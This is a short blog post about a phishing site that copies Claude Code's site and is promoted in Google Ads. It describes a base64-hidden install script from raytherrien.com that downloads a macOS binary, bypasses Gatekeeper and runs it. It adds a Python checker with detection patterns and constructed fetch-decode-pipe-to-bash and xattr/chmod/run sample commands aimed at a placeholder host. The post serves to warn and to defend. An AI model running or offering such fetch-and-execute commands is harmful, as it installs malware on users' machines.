Fake Claude Code Website: How I Found a Phishing Site in Google Ads
Phishing site impersonating Claude Code found in Google Ads: copied design, base64-encoded install script, malicious binary. How to spot the fake.
How I Found a Fake Claude Code Site
I wanted to google how to natively work with multiple agents for different roles out of the box in Claude Code without external crutches.
AND BOOM — A Claude Code AD. Suspicious site? 👁️‍🗨️ I clicked it.
How the Phishing Attack Works
The site is completely copied from the official Claude site. The only difference is the install script for macOS. There's a base64-encoded link to raytherrien.com, which returns a 1-line script that:
- Downloads a ~7MB binary for macOS
- Disables macOS security (Gatekeeper)
- Makes it executable and runs it
What it does after that — I didn't investigate further.
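A pre-run check for install one-liners like the one described above, as an added example that is not code from the original post or from the fake site: it decodes base64-looking tokens, lists hosts outside an allowlist, and flags Gatekeeper-related and execute-permission commands. The allowlist, the regex patterns, and the `example.invalid` sample strings are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Assumption: hosts you have verified yourself as the vendor's own.
TRUSTED_HOSTS = {"claude.ai", "anthropic.com"}
# Assumption: common shell idioms for the steps the post lists; the post
# does not show the exact commands the fake script used.
RISKY = {
    "gatekeeper-bypass": re.compile(r"com\.apple\.quarantine|xattr\s+-c|spctl\s+--master-disable"),
    "make-executable": re.compile(r"chmod\s+(\S*\+x|[0-7]{3,4})\b"),
    "pipe-to-shell": re.compile(r"\|\s*(ba|z)?sh\b"),
}
B64 = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;)]+")

def decode_b64_tokens(text):
    """Return printable strings hidden inside base64-looking tokens."""
    out = []
    for tok in B64.findall(text):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            s = raw.decode("utf-8")
        except ValueError:  # not valid base64, or not valid UTF-8 text
            continue
        if s and all(c.isprintable() or c.isspace() for c in s):
            out.append(s)
    return out

def is_trusted(host):
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)

def inspect(script):
    """Report hidden layers, non-allowlisted hosts and risky commands."""
    layers = [script] + decode_b64_tokens(script)
    hosts, flags = set(), set()
    for layer in layers:
        hosts.update(urlparse(u).hostname or "" for u in URL.findall(layer))
        flags.update(name for name, rx in RISKY.items() if rx.search(layer))
    return {
        "hidden_layers": len(layers) - 1,
        "untrusted_hosts": sorted(h for h in hosts if h and not is_trusted(h)),
        "flags": sorted(flags),
    }

# Constructed samples with a placeholder host, not taken from the real site.
_hidden = base64.b64encode(b"https://cdn.example.invalid/get.sh").decode()
SAMPLE_INSTALL = f'curl -fsSL "$(echo {_hidden} | base64 -d)" | bash'
SAMPLE_FETCHED = "curl -so /tmp/u https://cdn.example.invalid/u && xattr -c /tmp/u && chmod +x /tmp/u && /tmp/u"
```

A non-zero `hidden_layers` together with an entry in `untrusted_hosts` is the pattern the post describes: the visible command looks like the official one, and the real destination only appears after decoding.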
How to Protect Yourself from AI Tool Phishing
Be careful, especially when downloading programs from the internet or running prompts/skills without reading them.
Many people will fall victim because of the AI hype, just like they did during the crypto boom.
Original post in Telegram: @danokhlopkov
Dan Okhlopkov — AI agent practitioner. Building tools for TON Blockchain analysis and Telegram automation.